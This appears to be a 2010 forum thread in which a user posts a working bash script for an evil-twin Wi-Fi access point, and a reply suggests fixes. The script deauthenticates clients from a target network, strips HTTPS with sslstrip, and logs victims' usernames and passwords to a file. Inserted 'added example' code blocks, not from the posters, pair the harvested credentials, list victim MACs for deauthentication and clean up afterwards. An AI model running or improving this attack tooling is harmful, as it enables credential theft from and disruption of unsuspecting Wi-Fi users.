
Thread: Seeking advice on my moddboxx port forwarding script

  1. #1 lithiumr1 (Just burned his ISO; joined Mar 2010; 2 posts)

    Seeking advice on my moddboxx port forwarding script

    The object of this script is to automate running an evil access point (i.e. MODDBOXX). You connect your ethernet port to the WAN port on your AP and then moddboxx:
    1. Sets up DHCP for the WAN port of the AP (works)
    2. Changes your wlan0 MAC address (works)
    3. Starts sslstrip / ettercap for MITM (sslstrip works great / ettercap not implemented yet)
    4. Starts a RADIUS server w/ an "evil" anon "Free Wifi" login prompt that connects back to Metasploit (not finished yet)
    5. Opens various konsoles so that files / connections can be monitored in real time (works)
    6. Automates airdrop-ng to drop clients from other APs (works okay on 1 card.. would be better with 2)

    I had to move the script to the reply. It's almost too long for one post. Doh!

    UPDATES:
    1. Setting mac on iface to allow a static entry in airdrop's droprules.conf works now

    2. Fixed airdrop. If we set airodump on 1 channel and then run airdrop -s 30 (for every 30 seconds) it's enough to *encourage* clients to connect without overloading the card so we can still have internet access. Would be MUCH better with two cards I think but it functions on just one. The script would have to be edited to allow for two cards.

    3. Added aireplay-ng to deauth clients as well. Currently it only runs once but I'm going to try to find a way to loop it where you can select target mac, send a few deauth packets, then select another mac, so on and so forth.

    4. Tailing sslstrip so you can see info coming in. Still have NOT fixed grepping out the domain/username/password. Right now we grep out any secure posts, which sslstrip does on its own, but I wanted to set it up where as much info was captured as possible and important info was then grep/awk/sed into a separate txt file. It is actually pretty easy to read through the secure posts though. Still would like to refine it anyway.

    5. Script checks to see if mon0 is already up. If yes then it does nothing, if no it enables monitor mode. This was a big deal because if you ran the script 2, 3, or 4 times you'd end up with mon1, mon2, etc. and that was annoying.

    Things I'm working on / need help with........

    1. Trying to set up an http redirect or something where the first time a user logs on they have to go to an "accept terms and conditions" page and after they accept then they can access the WAN. Not really sure how to do that yet. Freeradius seems like it may be a solution; however, I'm not sure that it's really necessary.

    2. The grep >> pass.txt needs to be refined. I have it set up where it logs logins and passwords but they are not associated, so you kind of have to pick and match.... that needs some fixing.

    3. Would like to set up a trap (I think it's a trap?) to rm any tmp files when the script exits. ex: droprulesmod.conf / tmp.txt

    4. When airodump starts it appends a "0-1" to the end of the capture file... which is fine. What I'd like to do is have the script use the latest one for airdrop. It is currently static and just uses "capture-01.csv", but if this is the second time (or 3rd, 4th, etc.) that airodump has run in that dir moddboxx still uses "0-1" for airdrop.

    5. Lots of other stuff I'd like to add that I'll get to eventually.
    Last edited by lithiumr1; 03-22-2010 at 07:30 AM. Reason: updates
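One way to handle item 2 above (logins and passwords landing in pass.txt unpaired), added here as an example and not part of lithiumr1's script: instead of grepping single fields out of the tail stream, read each POST body as a unit and emit host, user and password together on one line. It assumes sslstrip's default log layout, a "<timestamp> [SECURE] POST Data (host):" header line with the raw form body on the line after it; the sample log it parses is constructed for this example and the field names it recognises are an assumed starting list.

```bash
#!/bin/bash
# Added example (not part of the original post or the moddboxx script): pull the
# login and the password out of the *same* sslstrip POST body so they stay
# associated, instead of grepping fields one at a time into pass.txt.
# Assumed log layout (sslstrip's default): a "<timestamp> [SECURE] POST Data (host):"
# line, with the raw form body on the following line.

extract_creds() {
    # $1: path to an sslstrip.log
    # prints one "host<TAB>user<TAB>password" line per POST that carried either field
    awk '
        /POST Data \(/ {
            host = $0
            sub(/^.*POST Data \(/, "", host)   # strip timestamp and prefix
            sub(/\):.*$/, "", host)            # strip trailing "):"
            want = 1                           # next line is the body
            next
        }
        want == 1 {
            want = 0
            user = ""; pass = ""
            n = split($0, kv, "&")
            for (i = 1; i <= n; i++) {
                eq = index(kv[i], "=")
                if (eq == 0) continue
                k = tolower(substr(kv[i], 1, eq - 1))
                v = substr(kv[i], eq + 1)
                if (user == "" && k ~ /^(user|username|login|log|email)$/) user = v
                if (pass == "" && k ~ /^(pass|passwd|password|pwd)$/)     pass = v
            }
            if (user != "" || pass != "")
                printf "%s\t%s\t%s\n", host, user, pass
        }
    ' "$1"
}

# Constructed sample log for the example (not a real capture).
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
2010-03-22 07:30:01,101 SECURE POST Data (www.example.com):
user=alice&pass=s3cret&remember=1

2010-03-22 07:31:12,442 POST Data (forum.example.net):
login=bob&pwd=hunter2&submit=Login

2010-03-22 07:32:00,009 SECURE POST Data (search.example.org):
q=nothing+to+see
EOF

extract_creds "$SAMPLE_LOG"
```

Point it at the real sslstrip.log instead of $SAMPLE_LOG; the third POST in the sample produces no line because it carries neither a login nor a password field, and values are left URL-encoded as sslstrip logged them.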

  2. #2 lithiumr1 (Just burned his ISO; joined Mar 2010; 2 posts)

    updated script

    Code:
    #!/bin/bash
    #moddboxx evil ap script
    #script written by lithiumr1@gmail.com
    clear
    echo -e -n "\n \n"
    echo -e -n "          :::::::::::::::::::::::::::::::::MODDBOXX:::::::::::::::::::::::::::::::::: \n"
    echo -e -n "                               Script by LithiumR1 Copywrong 2010 \n"
    echo -e -n "                                      Version .01 Beta \n \n"
    
    echo -e -n "\n Interface to connect to the internet?: "
    read -e IFNET
    
    echo -n -e "\n Change mac for $IFNET (required for airdrop)? y/n: "
    read -e IFNETMACCHANGE
    
    if [ "$IFNETMACCHANGE" = "y" ]; then
    echo -e -n "\n Changing mac for $IFNET ..............\n"
    ifconfig $IFNET down
    macchanger -m 00:11:22:33:44:55 $IFNET #this mac is static so that we can leave it in the allow list for airdrop
    ifconfig $IFNET up
    sleep 1
    ifup $IFNET & #was hardcoded to wlan0; bring up the interface whose mac we just changed
    sleep 5
    echo -e -n "\n If you were previously connected to the internet on $IFNET you may need to reconnect! \n"
    fi
    
    echo -n -e "\n Choose a number for deauth tool: \n 1. Airdrop-ng \n 2. Aireplay-ng  \n 3. Nothing \n :"
    read -e DEAUTH
    
    if [ "$DEAUTH" = "1" ] || [ "$DEAUTH" = "2" ]; then
    #both deauth tools need a monitor interface and an airodump capture, so this block is shared
    MON=$(airmon-ng | grep -Eo "mon0") #empty if mon0 does not exist yet (no tmp.txt needed)
    echo -e -n "\n What interface for airodump?: "
    read -e IFDUMP	
    
    	if [ "$MON" = "mon0" ]; then
    	echo -e -n "\n Monitor mode is already enabled on $IFDUMP \n"
    	else
    	echo -e -n "\n Enabling monitor mode......... \n"
    	airmon-ng start $IFDUMP #on BT4 this creates mon0, which is what the rest of the script uses
    	fi
    
    echo -e -n "\n Listing access points within range............. \n"
    iwlist $IFDUMP scanning |grep -E "(ESSID|Address|Channel:)"
    echo -e -n "\n What channel is the target ap on?: "
    read -e CHANNEL
    echo -e -n "\n What is the target ap's mac address?: "
    read -e TMAC
    
    	if [ "$DEAUTH" = "1" ]; then
    	echo -e -n "\n Creating rules for airdrop.......... \n"
    	echo "a/any|00:11:22:33:44:55" > droprulesmod.conf #this is why we set the static mac for $IFNET rather than --random
    	echo "d/$TMAC|any" >> droprulesmod.conf #I'd like to create a loop in another konsole that scans so you can add more target macs 
    	fi
    
    echo -e -n "\n Starting airodump on mon0..............\n"
    konsole --noframe --notabbar --nomenubar --notoolbar -e airodump-ng -w capture -c $CHANNEL --output-format csv mon0 &
    fi
    
    echo -e -n "\n Start dhcp for eth0? y/n: "
    read -e DHCP
    
    if [ "$DHCP" = "y" ]; then
    echo -e -n "\n Taking eth0 down...........\n"
    ifconfig eth0 down
    sleep 2
    
    echo -e -n "\n Bringing eth0 back up............\n"
    ifconfig eth0 up
    sleep 1
    
    echo -e -n "\n Setting ipaddress and netmask on eth0..........\n"
    ifconfig eth0 10.0.0.1 netmask 255.255.255.0
    sleep 1
    
    echo -e -n "\n Starting dhcp for eth0................\n"
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    konsole --geometry 645x25+0+175 --noframe --notabbar --nomenubar --notoolbar -e dhcpd3 -d -f -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid &
    sleep 1 #depends on how long it takes for your AP to get an IP.... mine is pretty fast
    
    echo -e -n "\n Temporarily disabling routing............\n"
    echo 0 > /proc/sys/net/ipv4/ip_forward
    
    echo -e -n "\n Temporarily blocking all traffic................\n"
    iptables -P OUTPUT DROP
    iptables -P INPUT DROP
    iptables -P FORWARD DROP
    
    echo -e -n "\n Deleting/Flushing old iptables rules..............\n"
    iptables -F
    iptables -t nat -F
    iptables -t mangle -F
    iptables -X
    sleep 1
    
    echo -e -n "\n Setting default ALLOW policies..................\n"
    iptables -P OUTPUT ACCEPT
    iptables -P INPUT ACCEPT
    iptables -P FORWARD ACCEPT
    
    echo -e -n "\n Allowing local loopback [NEEDED?].................\n"
    iptables -A INPUT -i lo -j ACCEPT
    
    echo -e -n "\n Allowing pings [OPTIONAL].............\n"
    iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
    iptables -A FORWARD -p icmp --icmp-type echo-request -j ACCEPT
    
    
    ############ STATE STUFF ############
    echo -e -n "\n Accepting existing connections [NEEDED]................\n"
    iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    sleep 1
    
    # Allow any new connections from internal network
    # [ONLY NEEDED IF PORTS ARE NOT EXPLICITLY FORWARDED BELOW]
    #iptables -A INPUT -m state --state NEW -i eth0 -j ACCEPT
    #####################################
    
    echo -e -n "\n Setting externally accessible inbound services [OPTIONAL]...............\n"
    echo -e -n " You may want to disable Bittorrent ports on large networks.\n"
    iptables -A INPUT -p tcp --dport 44444 -m state --state NEW -j ACCEPT #SSH
    iptables -A INPUT -p tcp -i $IFNET --dport 23232 -m state --state NEW -j ACCEPT #Bittorrent (external side is $IFNET, was hardcoded to wlan0)
    iptables -A INPUT -p udp -i $IFNET --dport 23232 -m state --state NEW -j ACCEPT #Bittorrent
    
    echo -e -n "\n Setting internal inbound services [OPTIONAL - DNS NEEDED]..............\n"
    iptables -A INPUT -p udp -i eth0 --dport 53 -m state --state NEW -j ACCEPT #DNS cache
    iptables -A INPUT -p tcp -i eth0 --dport 53 -m state --state NEW -j ACCEPT #DNS cache
    iptables -A INPUT -p udp -i eth0 --dport 137:139 -m state --state NEW -j ACCEPT #SAMBA
    iptables -A INPUT -p tcp -i eth0 --dport 445 -m state --state NEW -j ACCEPT #SAMBA
    
    echo -e -n "\n Allowing forwarding of essential services..............\n"
    iptables -A FORWARD -p tcp --dport 80 -j ACCEPT #WEB
    iptables -A FORWARD -p tcp --dport 443 -j ACCEPT #HTTPS
    
    echo -e -n "\n Setting masquerade on $IFNET...............\n"
    iptables -t nat -A POSTROUTING -o $IFNET -j MASQUERADE #NAT out of the internet interface chosen above, not a hardcoded wlan0
    
    echo -e -n "\n Enabling ip_forwarding...............\n"
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    fi
    
    echo -e -n "\n ::::::::::::::::Log into your AP and set the SSID to match the target ap:::::::::::::::\n"
    echo -e -n " Press ENTER when you are done: "
    read -e
    echo -e -n "\n Choose your mitm tool: \n 1. Sslstrip \n 2. Ettercap (not there yet) \n 3. Nothing \n : "
    read -e STRIPPERS1 #Yay for Strippers!! ;)
    
    echo -e -n "\n Use urlsnarf? y/n: "
    read -e URLSNARF
    
    echo -e -n "\n Tcptrack is NOT installed on BT4 by default.\n"
    echo -e -n " apt-get install tcptrack if you want it. \n"
    echo -e -n " Use tcptrack? y/n: "
    read -e TCPTRACK
    
    if [ "$STRIPPERS1" = "1" ]; then
    echo -e -n "\n Redirecting for sslstrip ;)...............\n"
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
    
    echo -e -n "\n Starting sslstrip.............\n"
    konsole --geometry 645x200+0+321 --noframe --notabbar --nomenubar --notoolbar -e sslstrip -a -l 8080 &
    sleep 2
    
    echo -e -n "\n Staring Tail to watch sslstrip.log (it's cool to watch stuff flow in)........... \n"
    konsole --geometry 645x200+0+321 --noframe --notabbar --nomenubar --notoolbar -e tail -f -s 1 -v sslstrip.log &
    
    echo -e -n "\n Logging *some* common passwords like facebook, gmail, ect. to pass.txt \n"
    echo -e -n " Not all passwords will be logged to this file so you may wish to look manually. \n"
    echo -e -n " If anyone has a better way to do this let me know!!!\n"
    tail -f -s 1 -v sslstrip.log |grep --line-buffered -Eo "(user|login|pass|passwd|password|pwd)=[0-9A-Za-z._%-]*" >> pass.txt & #A-Za-z: the old A-z range also matched [ \ ] ^ `; --line-buffered so hits reach pass.txt right away
    tail -f -s 1 -v sslstrip.log |grep --line-buffered -i -A 1 "SECURE POST data" >> securepostdata.log & #-A 1 because sslstrip writes the post body on the line after the header
    fi
    
    if [ "$STRIPPERS1" = "2" ]; then
    echo -e -n "\n Sorry, I haven't added ettercap to the script yet :( \n" # But this is where it will go when I do!!
    fi
    
    if [ "$URLSNARF" = "y" ]; then
    echo -e -n "\n Starting urlsnarf............ \n"
    konsole --geometry 645x200+0+548 --noframe --notabbar --nomenubar --notoolbar -e urlsnarf -i eth0 &
    fi
    
    if [ "$TCPTRACK" = "y" ]; then
    echo -n -e "\n Starting tcptrack.......... \n"
    konsole --geometry 645x800+800+0 --noframe --notabbar --nomenubar --notoolbar -e tcptrack -i $IFNET & #watch the internet interface chosen above
    fi
    
    if [ "$DEAUTH" = "1" ]; then
    
    echo -n -e "\n You really need 2 cards for this and airodump needs to have been running for a while. \n"
    
    echo -n -e "\n Starting airdrop...... \n"
    sleep 20
    CAPCSV=$(ls -t capture-*.csv 2>/dev/null | head -n 1) #newest airodump csv, so a 2nd/3rd run in this dir does not keep feeding airdrop capture-01.csv
    konsole --geometry 645x25+0+175 --noframe --notabbar --nomenubar --notoolbar -e airdrop-ng -i mon0 -t $CAPCSV -r droprulesmod.conf -s 30 &
    sleep 5
    TMP=$(ps -A | grep -Eo "airdrop-ng" | head -n 1) #no tmp.txt needed, so nothing to clean up on exit
    	if [ "$TMP" = "airdrop-ng" ]; then
    	echo -e -n "\n Airdrop running \n"
    	else
    	echo -e -n "\n Airdrop failed... probably due to not having any client macs from airodump. \n You can try it manually in a few minutes. \n"
    	fi
    fi
    
    if [ "$DEAUTH" = "2" ]; then
    echo -e -n "\n Listing client macs............. \n"
    grep -A 25 "Station MAC" "$(ls -t capture-*.csv 2>/dev/null | head -n 1)" #newest csv instead of the hardcoded capture-01.csv
    echo -e -n "\n What is the client mac address to deauth?: "
    read -e CMAC
    echo -e -n "\n How many deauth packets would you like to send? "
    read -e PCKNUM
    aireplay-ng -a $TMAC -c $CMAC -0 $PCKNUM mon0
    fi
    
    
    echo -n -e "\n \n"
    echo -n -e "        If you set up chillispot on your ap (I use dd-wrt) don't forget to start SET!!\n"
    echo -n -e "   :::::::::::::::::::::::MODDBOXX finished. Have a Great day!!!::::::::::::::::::::::::::::: \n"
    Last edited by lithiumr1; 03-22-2010 at 07:34 AM.
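For item 3 of the first post (a trap that cleans up temp files when the script exits), an added example that is not part of the posted script: every helper the script backgrounds and every temp file it creates is recorded as it is made, and a single EXIT trap tears all of them down on normal exit, Ctrl-C or kill. Recording PIDs avoids killall by name, which on a shared box can hit processes the script did not start. The spawn/newtmp/cleanup names are this example's own; sleep stands in for konsole/airodump-ng/sslstrip, and the airmon-ng stop line is left as a comment because it needs the real interface.

```bash
#!/bin/bash
# Added example (not from the original script): one EXIT trap that tears down
# every helper the script backgrounded and every temp file it created.  PIDs are
# recorded at spawn time so the cleanup never has to "killall" by name.
# "sleep" stands in here for konsole/airodump-ng/sslstrip.

PIDS=""
TMPFILES=""

spawn() {
    # run "$@" in the background and remember its PID
    "$@" &
    PIDS="$PIDS $!"
}

newtmp() {
    # create a temp file, remember it, and hand it back in $TMP
    # (a plain function, not $(...), so the bookkeeping happens in this shell)
    TMP=$(mktemp) || return 1
    TMPFILES="$TMPFILES $TMP"
}

cleanup() {
    trap - EXIT INT TERM           # run once, even if a signal arrives mid-cleanup
    for p in $PIDS; do kill "$p" 2>/dev/null || true; done
    for p in $PIDS; do wait "$p" 2>/dev/null || true; done   # reap, so kill -0 is reliable
    for f in $TMPFILES; do rm -f "$f"; done
    PIDS=""; TMPFILES=""
    # airmon-ng stop mon0   # on the real box, once the helpers are gone
}

alive() { kill -0 "$1" 2>/dev/null; }

trap cleanup EXIT
trap 'exit 130' INT    # Ctrl-C: exit, which fires the EXIT trap
trap 'exit 143' TERM

# demo: two background helpers and one scratch file (cleaned up when the script ends)
spawn sleep 60
spawn sleep 60
newtmp
echo "helpers:$PIDS  tmp:$TMPFILES"
```

Each konsole/airodump/sslstrip line in the script becomes a spawn call, droprulesmod.conf is written to $TMP after newtmp, and nothing else has to remember what to kill or delete.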

  3. #3 CKing (Member; joined Mar 2010; location: downtown, riverfront; 83 posts)

    Re: Seeking advice on my moddboxx port forwarding script

    Why not use the date instead of capture for the name that airodump outputs? This would help organize as well if you wanted to keep the cap files for some reason.
    It would look like:

    Code:
    NOW=$(date +"-%b-%d-%y-%H%M%S")        # e.g. -Mar-22-10-073000
    airodump-ng mon0 -w /tmpdirpath/$NOW   # airodump appends -01, so the csv is /tmpdirpath/$NOW-01.csv
    Then you can point airdrop to $NOW-01.csv

    Your trap would look like:

    Code:
    function cleanup ()
    {	rm -f /tmpdirpath/filestodelete   # the temp files the script wrote
    	killall whatever-is-running      # placeholder: the helpers the script backgrounded
    	airmon-ng stop mon0
    	# whatever else you want
    	exit 1
    }
    trap cleanup INT   # define the function, then arm it for Ctrl-C
    Let me know if you figure out that redirect thing for a terms of use page; I'm interested in seeing how that would work. I think airsnarf did something similar so you might wanna check out how that was written.
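Putting the date-based prefix suggested here together with item 4 from the first post (airdrop always gets capture-01.csv), as an added example that is code from neither post: a helper that picks the newest airodump-ng CSV for any prefix, and a second one that reads the station table of that CSV and lists the clients associated with the target BSSID, which is what the deauth loop in item 3 of the first post needs. It assumes airodump-ng's CSV layout (an AP table, a blank line, then a "Station MAC, ..." table whose sixth column is the associated BSSID); the two CSV files it creates are constructed for the example, not real captures.

```bash
#!/bin/bash
# Added example (not the original script's code): pick the newest airodump-ng CSV
# for a given prefix, so a 2nd or 3rd run in the same directory no longer feeds
# airdrop-ng the stale capture-01.csv, and list the stations associated with the
# target BSSID from that file.  Works with the date-based prefix suggested in the
# reply just as well as with "capture".  The CSV contents below are constructed
# to match airodump-ng's CSV layout; they are not a real capture.

latest_csv() {
    # $1: directory, $2: airodump -w prefix  ->  newest "<prefix>-NN.csv" (empty if none)
    ls -t "$1"/"$2"-[0-9][0-9].csv 2>/dev/null | head -n 1
}

clients_of() {
    # $1: airodump CSV, $2: target BSSID  ->  one associated station MAC per line
    # Two tables in the file: APs first, then "Station MAC, ..." whose 6th column
    # is the BSSID the station is associated with ("(not associated)" otherwise).
    awk -F', *' -v bssid="$(printf '%s' "$2" | tr 'a-f' 'A-F')" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && NF >= 6 && toupper($6) == bssid { print $1 }
    ' "$1"
}

# --- constructed demo data ---------------------------------------------------
DEMO_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_DIR"' EXIT
cat > "$DEMO_DIR/capture-01.csv" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-03-22 07:00:00, 2010-03-22 07:05:00,  6,  54, WPA2, CCMP, PSK, -40, 20, 0, 0.  0.  0.  0, 8, FreeWifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:99, 2010-03-22 07:01:00, 2010-03-22 07:04:00, -60, 10, 00:11:22:33:44:55, FreeWifi
EOF
cat > "$DEMO_DIR/capture-02.csv" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-03-22 07:30:00, 2010-03-22 07:35:00,  6,  54, WPA2, CCMP, PSK, -40, 120, 0, 0.  0.  0.  0, 8, FreeWifi, 
66:77:88:99:AA:BB, 2010-03-22 07:30:00, 2010-03-22 07:35:00, 11,  54, OPN, , , -70, 90, 0, 0.  0.  0.  0, 7, linksys, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2010-03-22 07:30:10, 2010-03-22 07:34:50, -55, 230, 00:11:22:33:44:55, FreeWifi
AA:BB:CC:DD:EE:02, 2010-03-22 07:31:00, 2010-03-22 07:33:00, -70, 12, (not associated), linksys
AA:BB:CC:DD:EE:03, 2010-03-22 07:32:00, 2010-03-22 07:34:00, -62, 45, 00:11:22:33:44:55, 
EOF
# give the two files distinct mtimes so "newest" is well defined
touch -t 201003220705 "$DEMO_DIR/capture-01.csv"
touch -t 201003220735 "$DEMO_DIR/capture-02.csv"

CAPCSV=$(latest_csv "$DEMO_DIR" capture)
echo "newest capture: $CAPCSV"
echo "clients of 00:11:22:33:44:55:"
clients_of "$CAPCSV" 00:11:22:33:44:55
```

In the script this replaces the hardcoded capture-01.csv with `-t "$(latest_csv . capture)"` for airdrop-ng, and `clients_of` feeds aireplay-ng's -c argument one MAC at a time; with the $NOW prefix from above, call `latest_csv /tmpdirpath "$NOW"` instead.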
